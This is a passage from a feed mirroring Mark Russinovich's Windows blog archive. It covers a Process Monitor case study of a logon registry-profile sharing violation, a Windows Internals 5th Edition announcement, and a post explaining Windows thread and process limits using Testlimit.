file. If it is writing to the file it may allow other processes to read from the file, for example, but not to also write to the file. The sharing violation in the log file meant that another process had opened the user’s registry hive in a way that was incompatible with the way that the logon process wanted to open the file. </P> <P> In the meantime, more customers around the world began contacting Microsoft and Citrix with the same issue, all had also deployed the new ICA client. Citrix support then reported that they suspected that the sharing violation might be caused by one of the ICA client’s processes, Ssonvr.exe. During installation, the ICA client registers a Network Provider DLL (Pnsson.dll) that the Windows Multiple Provider Notification Application (%SystemRoot%\System32\Mpnotify.exe) calls when the system boots. Mpnotify.exe is itself launched at logon by the Winlogon process.The Citrix notification DLL launches the Ssonvr.exe process asynchronous to the user’s logon: </P> <P> <IMG alt="image" border="0" height="264" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121161i6CDB52EC6B0D1402" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="450" /> </P> <P> The only problem with the theory was that Citrix developers insisted that the process did not attempt to load any user registry profile or even read any keys or values from one. Both Microsoft and Citrix were stumped. </P> <P> Microsoft created a version of Winlogon and the kernel with additional diagnostic information and tried to reproduce the problem on lab systems configured identically to the client’s, but without success. The customer couldn’t even reproduce the problem with the modified Windows images, presumably because the images changed the timing of the system enough to avoid the problem. At this point a Microsoft support engineer suggested that the customer capture a trace of logon activity with Process Monitor. </P> <P> There are a couple of ways to configure Process Monitor to record logon operations: one is to use <A href="#" target="_blank"> Sysinternals PsExec </A> to launch it in the session 0 so that it survives the logoff and subsequent logon and another is to use the boot logging feature to capture activity from early in the boot, including the logon. The engineer chose the latter, so he told the customer to run Process Monitor on one of the system’s that persistently exhibited the problem, select Enable Boot Logging from the Process Monitor Options menu, and reboot, repeating the steps until the problem reproduced. This procedure configures the Process Monitor driver to load early in the boot process and log activity to %SystemRoot%\Procmon.pmb. Once the user logged encountered the issue, they were to run Process Monitor again, at which point the driver would stop logging and Process Monitor would offer to convert the boot log into a standard Process Monitor log file. </P> <P> After a couple of attempts the user captured a boot log file that they submitted to Microsoft. Microsoft support engineers scanned through the log and came across the sharing violation error when Winlogon tried to load the user’s registry hive: </P> <P> <IMG alt="image" border="0" height="114" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121162i3A3F779C738EB387" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It was obvious from operations immediately preceding the error that Ssonsvr.exe was the process that had the hive opened. The question was, why was Ssonsvr.exe opening the registry hive? To answer that question the engineers turned to Process Monitor’s stack trace functionality. Process Monitor captures a call stack for every operation, which represents the function call nesting responsible for the operation. By looking at a call stack you can often determine an operation’s root cause when it might not be obvious just from the process that executed it. For example, the stack shows you if a DLL loaded into the process executed the operation and, if you have symbols configured and the call originates in a Windows image or other image for which you have symbols, it will even show you the names of the responsible functions. </P> <P> The stack for Ssonsvr.exe’s open of the Ntuser.dat file showed that Ssonsvr.exe wasn’t actually responsible for the operation, the Windows Logical Prefetcher was: </P> <P> <IMG alt="image" border="0" height="170" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheNewLogonRegistryProfiles_DF02/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121163i215FCDD4E6E657EB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="429" /> </P> <P> Introduced in Windows XP, the Logical Prefetcher is a kernel component that monitors the first ten seconds of a process launch, recording the directories and portions of files accessed by the process during that time to a file it stores in %SystemRoot%\Prefetch. So that multiple executables with the same name but in different directories get their own prefetch file, the Logical Prefetcher gives the file a name that’s a concatenation of the executable image name and the hash of the path in which the image is stored e.g. NOTEPAD.EXE-D8414F97.pf. You can actually see the files and directories the Logical Prefetcher saw an application reference the last time it launched by using the Sysinternals <A href="#" target="_blank"> Strings </A> utility to scan a prefetch file like this: </P> <P> <FONT face="Courier New"> strings &lt;prefetch file&gt; </FONT> </P> <P> The next time the application launches, the Logical Prefetcher, executing in the context of the process’s first thread, looks for a prefetch file. If one exists, it opens each directory it lists to bring the directory’s metadata into memory if not already present. The Logical Prefetcher then maps each file listed in the prefetch file and references the portions accessed the last time the application ran so that they also get brought into memory. The Logical Prefetcher can speed up an application launch because it generates large, sequential I/Os instead of issuing small random accesses to file data as the application would typically do during startup. </P> <P> The implication of the Logical Prefetcher in the profile problem only raised more questions, however. Why was it prefetching the user’s hive file in the context of Ssonsvr.exe when Ssonsvr.exe itself never accesses registry profiles? Microsoft support contacted the Logical Prefetcher’s development team for the answer. The developers first noted that the registry on Windows XP is read into memory using cached file I/O operations, which means that the Cache Manager’s read-ahead thread will proactively read portions of the hive. Since the read-ahead thread executes in the System process, and the Logical Prefetcher associates System process activity with the currently launching process, that a specific timing sequence of process launches and activity during the boot and log on could cause hive accesses to be seen by the Logical Prefetcher as being part of the Ssonsvr.exe launch. If the order was slightly different the next boot and log on, Winlogon might collide with the Logical Prefetcher, as seen in the captured boot log. </P> <P> The Logical Prefetcher is supposed to execute transparently to other activity on a system, but its file references can lead to sharing violations like this on Windows XP systems (on server systems the Logical Prefetcher only prefetches boot activity, and it does so synchronously before the boot process proceeds). For that reason, on Windows Vista and Windows 7 systems, the Logical Prefetcher makes use of a file system minifilter driver, Fileinfo (%SystemRoot%\System32\Drivers\Fileinfo.sys), to watch for potential sharing violation collisions and prevent them by stalling a second open operation on a file being accessed by the Logical Prefetcher until the Logical Prefetcher closes the file. </P> <P> Now that the problem was understood, Microsoft and Citrix brainstormed on workarounds customers could apply while Citrix worked on an update to the ICA Client that would prevent the sharing violation. One workaround was to disable application prefetching and another was to write a logoff script that deletes the Ssonsvr.exe prefetch files. Citrix published the workarounds in this <A href="#" target="_blank"> Citrix Knowledge Base </A> article and Microsoft in this <A href="#" target="_blank"> Microsoft Knowledge Base </A> article. The update to the ICA Client, which was made available a few days later, changed the network provider DLL to 10 seconds after Ssonsvr.exe launches before returning control to Mpnotify.exe. Because Winlogon waits for Mpnotify to exit before logging on a user, the Logical Prefetcher won’t associate Winlogon’s accesses of the user’s hive with Ssonsvr.exe’s startup. </P> <P> As I said in the introduction, I find this case particularly interesting because it demonstrates a little known Process Monitor feature, boot logging, and the power of stack traces for root cause analysis, two key tools for everyone’s troubleshooting arsenal. It also shows how successful troubleshooting sometimes means coming up with a workaround when there’s no fix or you must wait until a vendor provides one. Another case successfully closed with Process Monitor! Please keep sending me screen shots and log files of the cases you solve. </P> </BODY></HTML> Thu, 27 Jun 2019 06:55:38 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-temporary-registry-profiles/ba-p/723832 MarkRussinovich 2019-06-27T06:55:38Z Windows Internals 5th Edition is Available! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-internals-5th-edition-is-available/ba-p/723826 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 06, 2009 </STRONG> <BR /> <P> I’m proud to announce that Windows Internals, 5th Edition is now available. It’s been a long road, but a writing a book of this scope <IMG align="right" alt="image" border="0" height="244" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/WindowsInternals5thEditionReleased_5408/image_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121158iD3495D83DD8D0D99" style="border-right-width: 0px; margin: 0px 0px 0px 15px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="190" /> is an incredibly detailed endeavor. This new edition covers Windows Vista and Windows Server 2008 (32-bit and 64-bit) and besides revisions and enhancements to existing content, adds an additional 250 pages, bringing the total page count to over 1200 (25% longer than the previous edition). Besides new experiments highlighting the Sysinternals tools, new topics covered include Hyper-V, the image loader, debugging infrastructure, Kernel Transaction Manager, Code Integrity, Thread Pools, Mandatory Integrity Controls, Windows Driver Framework, and Bitlocker, to name a few. </P> <P> We decided not to keep coverage of Windows XP and Windows Server 2003 because describing the commonalities and differences in certain areas where there have been significant changes across versions would have been complicated and confusing. However, 99% of the book applies directly to Windows 7 and Windows Server 2008 R2, so you can get a jump start while we work on the 6 <SUP> th </SUP> edition, which will add coverage of these new versions of Windows. We anticipate adding another 75-100 pages of content (and not making any significant changes to existing text) and are shooting to have the book completed by the end of the year. </P> <P> You can watch me and <A href="#" target="_blank"> David Solomon </A> talking about the book and our history of collaboration in <A href="#" target="_blank"> this Channel 9 interview </A> we recorded a couple of weeks ago. David and I coauthored the previous two editions alone, but this time around we add a third contributor, <A href="#" target="_blank"> Alex Ionescu </A> . Alex came to our attention back when he was a primary contributor to the kernel of the ReactOS project, an attempt to develop an open source clone of Windows. Alex now teaches Windows internals training classes with David Solomon, including on campus here at Microsoft like I used to do before I joined Microsoft. Needless to say, Alex was a valuable addition to our team on this revision of the book. </P> <P> Be sure to visit the official <A href="#" target="_blank"> Windows Internals book page </A> , where you can find more information on the book’s contents, errata (there is none at this point), and the downloads for the book’s demonstration programs like Testlimit, a tool that I’ve used in some of my <A href="#" target="_blank"> Pushing the Limits of Windows </A> blog posts to highlight various resource limits in Windows. </P> <P> I have one more thing I want to share with you, <A href="#" target="_blank"> a video </A> that the Windows marketing team put together as part of the <A href="#" target="_blank"> Talking About Windows </A> campaign that has elementary school students Sam and Trevor talking about Sysinternals. I didn’t know about the video until they sent it to me, and I have to admit that besides being flattered, I laughed out loud. </P> </BODY></HTML> Thu, 27 Jun 2019 06:55:01 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-internals-5th-edition-is-available/ba-p/723826 MarkRussinovich 2019-06-27T06:55:01Z Pushing the Limits of Windows: Processes and Threads https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 05, 2009 </STRONG> <BR /> <P> This is the fourth post in my Pushing the Limits of Windows series that explores the boundaries of fundamental resources in Windows. This time, I’m going to discuss the limits on the maximum number of threads and processes supported on Windows. I’ll briefly describe the difference between a thread and a process, survey thread limits and then investigate process limits. I cover thread limits first since every active process has at least one thread (a process that’s terminated, but is kept referenced by a handle owned by another process won’t have any), so the limit on processes is directly affected by the caps that limit threads. </P> <P> Unlike some UNIX variants, most resources in Windows have no fixed upper bound compiled into the operating system, but rather derive their limits based on basic operating system resources that I’ve already covered. Process and threads, for example, require physical memory, virtual memory, and pool memory, so the number of processes or threads that can be created on a given Windows system is ultimately determined by one of these resources, depending on the way that the processes or threads are created and which constraint is hit first. I therefore recommend that you read the preceding posts if you haven’t, because I’ll be referring to reserved memory, committed memory, the system commit limit and other concepts I’ve covered. Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <H3> Processes and Threads </H3> <P> A Windows process is essentially container that hosts the execution of an executable image file. It is represented with a kernel process object and Windows uses the process object and its associated data structures to store and track information about the image’s execution. For example, a process has a virtual address space that holds the process’s private and shared data and into which the executable image and its associated DLLs are mapped. Windows records the process’s use of resources for accounting and query by diagnostic tools and it registers the process’s references to operating system objects in the process’s handle table. Processes operate with a security context, called a token, that identifies the user account, account groups, and privileges assigned to the process. </P> <P> Finally, a process includes one or more threads that actually execute the code in the process (technically, processes don’t run, threads do) and that are represented with kernel thread objects. There are several reasons applications create threads in addition to their default initial thread: processes with a user interface typically create threads to execute work so that the main thread remains responsive to user input and windowing commands; applications that want to take advantage of multiple processors for scalability or that want to continue executing while threads are tied up waiting for synchronous I/O operations to complete also benefit from multiple threads. </P> <H3> Thread Limits </H3> <P> Besides basic information about a thread, including its CPU register state, scheduling priority, and resource usage accounting, every thread has a portion of the process address space assigned to it, called a stack, which the thread can use as scratch storage as it executes program code to pass function parameters, maintain local variables, and save function return addresses. So that the system’s virtual memory isn’t unnecessarily wasted, only part of the stack is initially allocated, or committed and the rest is simply reserved. Because stacks grow downward in memory, the system places guard pages beyond the committed part of the stack that trigger an automatic commitment of additional memory (called a stack expansion) when accessed. This figure shows how a stack’s committed region grows down and the guard page moves when the stack expands, with a 32-bit address space as an example (not drawn to scale): </P> <P> <IMG alt="image" border="0" height="346" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121136i3336D2B9F1BF1905" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="320" /> </P> <P> The Portable Executable (PE) structures of the executable image specify the amount of address space reserved and initially committed for a thread’s stack. The linker defaults to a reserve of 1MB and commit of one page (4K), but developers can override these values either by changing the PE values when they link their program or for an individual thread in a call to <A href="#" target="_blank"> CreateThread </A> . You can use a tool like <A href="#" target="_blank"> Dumpbin </A> that comes with Visual Studio to look at the settings for an executable. Here’s the Dumpbin output with the /headers option for the executable generated by a new Visual Studio project: </P> <P> <IMG alt="image" border="0" height="269" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121137iF90BA12EB3CC8DB7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Converting the numbers from hexadecimal, you can see the stack reserve size is 1MB and the initial commit is 4K and using the new Sysinternals <A href="#" target="_blank"> VMMap </A> tool to attach to this process and view its address space, you can clearly see a thread stack’s initial committed page, a guard page, and the rest of the reserved stack memory: </P> <P> <IMG alt="image" border="0" height="68" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121138i3B2441C8F1A1AF0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Because each thread consumes part of a process’s address space, processes have a basic limit on the number of threads they can create that’s imposed by the size of their address space divided by the thread stack size. </P> <H3> 32-bit Thread Limits </H3> <P> Even if the thread had no code or data and the entire address space could be used for stacks, a 32-bit process with the default 2GB address space could create at most 2,048 threads. Here’s the output of the <A href="#" target="_blank"> Testlimit </A> tool running on 32-bit Windows with the –t switch (create threads) confirming that limit: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121139i82087290E6A12CFD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Again, since part of the address space was already used by the code and initial heap, not all of the 2GB was available for thread stacks, thus the total threads created could not quite reach the theoretical limit of 2,048. </P> <P> I linked the Testlimit executable with the large address space-aware option, meaning that if it’s presented with more than 2GB of address space (for example on 32-bit systems booted with the /3GB or /USERVA Boot.ini option or its equivalent BCD option on Vista and later <I> increaseuserva </I> ), it will use it. 32-bit processes are given 4GB of address space when they run on 64-bit Windows, so how many threads can the 32-bit Testlimit create when run on 64-bit Windows? Based on what we’ve covered so far, the answer should be roughly 4096 (4GB divided by 1MB), but the number is actually significantly smaller. Here’s 32-bit Testlimit running on 64-bit Windows XP: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121140i973B4583320836D8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The reason for the discrepancy comes from the fact that when you run a 32-bit application on 64-bit Windows, it is actually a 64-bit process that executes 64-bit code on behalf of the 32-bit threads, and therefore there is a 64-bit thread stack and a 32-bit thread stack area reserved for each thread. The 64-bit stack has a reserve of 256K (except that on systems prior to Vista, the initial thread’s 64-bit stack is 1MB). Because every 32-bit thread begins its life in 64-bit mode and the stack space it uses when starting exceeds a page, you’ll typically see at least 16KB of the 64-bit stack committed. Here’s an example of a 32-bit thread’s 64-bit and 32-bit stacks (the one labeled “Wow64” is the 32-bit stack): </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121141i791E185F79CB743F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> 32-bit Testlimit was able to create 3,204 threads on 64-bit Windows, which given that each thread uses 1MB+256K of address space for stack (again, except the first on versions of Windows prior to Vista, which uses 1MB+1MB), is exactly what you’d expect. I got different results when I ran 32-bit Testlimit on 64-bit Windows 7, however: </P> <P> <IMG alt="image" border="0" height="135" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121142iE840ED659B83E4B1" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The difference between the Windows XP result and the Windows 7 result is caused by the more random nature of address space layout introduced in Windows Vista, Address Space Load Randomization (ASLR), that leads to some fragmentation. Randomization of DLL loading, thread stack and heap placement, helps defend against malware code injection. As you can see from this VMMap output, there’s 357MB of address space still available, but the largest free block is only 128K in size, which is smaller than the 1MB required for a 32-bit stack: </P> <P> <IMG alt="image" border="0" height="163" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121143i876928902845A20D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> As I mentioned, a developer can override the default stack reserve. One reason to do so is to avoid wasting address space when a thread’s stack usage will always be significantly less than the default 1MB. Testlimit sets the default stack reservation in its PE image to 64K and when you include the –n switch along with the –t switch, Testlimit creates threads with 64K stacks.&nbsp; Here’s the output on a 32-bit Windows XP system with 256MB RAM (I did this experiment on a small system to highlight this particular limit): </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121144iE0773D5B13EAB32C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Note the different error, which implies that address space isn’t the issue here. In fact, 64K stacks should allow for around 32,000 threads (2GB/64K = 32,768). What’s the limit that’s being hit in this case? A look at the likely candidates, including commit and pool, don’t give any clues, as they’re all below their limits: </P> <P> <IMG alt="image" border="0" height="247" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121145i23CAB1B86ECC1D66" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="374" /> </P> <P> It’s only a look at additional memory information in the kernel debugger that reveals the threshold that’s being hit, resident available memory, which has been exhausted: </P> <P> <IMG alt="image" border="0" height="185" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121146i6210685568811D48" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="483" /> </P> <P> Resident available memory is the physical memory that can be assigned to data or code that must be kept in RAM. Nonpaged pool and nonpaged drivers count against it, for example, as does memory that’s locked in RAM for device I/O operations. Every thread has both a user-mode stack, which is what I’ve been talking about, but they also have a kernel-mode stack that’s used when they run in kernel mode, for example while executing system calls. When a thread is active its kernel stack is locked in memory so that the thread can execute code in the kernel that can’t page fault. </P> <P> A basic kernel stack is 12K on 32-bit Windows and 24K on 64-bit Windows. 14,225 threads require about 170MB of resident available memory, which corresponds to exactly how much is free on this system when Testlimit isn’t running: </P> <P> <IMG alt="image" border="0" height="144" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121147i10DF51D6EFB3A96E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="457" /> </P> <P> Once the resident available memory limit is hit, many basic operations begin failing. For example, here’s the error I got when I double-clicked on the desktop’s Internet Explorer shortcut: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121148iC5E596A850812BEC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="415" /> </P> <P> As expected, when run on 64-bit Windows with 256MB of RAM, Testlimit is only able to create 6,600 threads – roughly half what it created on 32-bit Windows with 256MB RAM - before running out of resident available memory: </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121149i749EDE173AA6FA97" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The reason I said “basic” kernel stack earlier is that a thread that executes graphics or windowing functions gets a “large” stack when it executes the first call that’s 20K on 32-bit Windows and 48K on 64-bit Windows. Testlimit’s threads don’t call any such APIs, so they have basic kernel stacks. </P> <H3> 64-bit Thread Limits </H3> <P> Like 32-bit threads, 64-bit threads also have a default of 1MB reserved for stack, but 64-bit processes have a much larger user-mode address space (8TB), so address space shouldn’t be an issue when it comes to creating large numbers of threads. Resident available memory is obviously still a potential limiter, though. The 64-bit version of Testlimit (Testlimit64.exe) was able to create around 6,600 threads with and without the –n switch on the 256MB 64-bit Windows XP system, the same number that the 32-bit version created, because it also hit the resident available memory limit. However, on a system with 2GB of RAM, Testlimit64 was able to create only 55,000 threads, far below the number it should have been able to if resident available memory was the limiter (2GB/24K = 89,000): </P> <P> <IMG alt="image" border="0" height="130" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121150i48DE581EE87E26BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> In this case, it’s the initial thread stack commit that causes the system to run out of virtual memory and the “paging file is too small” error. Once the commit level reached the size of RAM, the rate of thread creation slowed to a crawl because the system started thrashing, paging out stacks of threads created earlier to make room for the stacks of new threads, and the paging file had to expand. The results are the same when the –n switch is specified, because the threads have the same initial stack commitment. </P> <H3> Process Limits </H3> <P> The number of processes that Windows supports obviously must be less than the number of threads, since each process has one thread and a process itself causes additional resource usage. 32-bit Testlimit running on a 2GB 64-bit Windows XP system created about 8,400 processes: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121151i893E19AC62BB84EE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> A look in the kernel debugger shows that it hit the resident available memory limit: </P> <P> <IMG alt="image" border="0" height="97" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121152i6E309F087AF55762" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="435" /> </P> <P> If the only cost of a process with respect to resident available memory was the kernel-mode thread stack, Testlimit would have been able to create far more than 8,400 threads on a 2GB system. The amount of resident available memory on this system when Testlimit isn’t running is 1.9GB: </P> <P> <IMG alt="image" border="0" height="45" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121153iC7E70560BCA933B9" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="361" /> </P> <P> Dividing the amount of resident memory Testlimit used (1.9GB) by the number of processes it created (8,400) yields 230K of resident memory per process. Since a 64-bit kernel stack is 24K, that leaves about 206K unaccounted for. Where’s the rest of the cost coming from? When a process is created, Windows reserves enough physical memory to accommodate the process’s minimum working set size. This acts as a guarantee to the process that no matter what, there will enough physical memory available to hold enough data to satisfy its minimum working set. The default working set size happens to be 200KB, a fact that’s evident when you add the Minimum Working Set column to <A href="#" target="_blank"> Process Explorer’s </A> display: </P> <P> <IMG alt="image" border="0" height="349" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_18.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121154iCB1F074155920319" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="317" /> </P> <P> The remaining roughly 6K is resident available memory charged for additional non-pageable memory allocated to represent a process. A process on 32-bit Windows will use slightly less resident memory because its kernel-mode thread stack is smaller. </P> <P> As they can for user-mode thread stacks, processes can override their default working set size with the <A href="#" target="_blank"> SetProcessWorkingSetSize </A> function. Testlimit supports a –n switch, that when combined with –p, causes child processes of the main Testlimit process to set their working set to the minimum possible, which is 80K. Because the child processes must run to shrink their working sets, Testlimit sleeps after it can’t create any more processes and then tries again to give its children a chance to execute. Testlimit executed with the –n switch on a Windows 7 system with 4GB of RAM hit a limit other than resident available memory: the system commit limit: </P> <P> <IMG alt="image" border="0" height="373" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121155iB33DBE32913B2030" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Here you can see the kernel debugger reporting not only that the system commit limit had been hit, but that there have been thousands of memory allocation failures, both virtual and paged pool allocations, following the exhaustion of the commit limit (the system commit limit was actually hit several times as the paging file was filled and then grown to raise the limit): </P> <P> <IMG alt="image" border="0" height="205" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_8FCD/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121156iDF0AF32FAFF3924C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="463" /> </P> <P> The baseline commitment before Testlimit ran was about 1.5GB, so the threads had consumed about 8GB of committed memory. Each process therefore consumed roughly 8GB/6,600, or 1.2MB. The output of the kernel debugger’s !vm command, which shows the private memory allocated by each active process, confirms that calculation: </P> <P> <IMG alt="image" border="0" height="342" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsProcessandThrea_C851/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121157i991D94960AB31C3C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="383" /> </P> <P> The initial thread stack commitment, described earlier, has a negligible impact with the rest coming from the memory required for the process address space data structures, page table entries, the handle table, process and thread objects, and private data the process creates when it initializes. </P> <H3> How Many Threads and Processes are Enough? </H3> <P> So the answer to the questions, “how many threads does Windows support?” and “how many processes can you run concurrently on Windows?” depends. In addition to the nuances of the way that the threads specify their 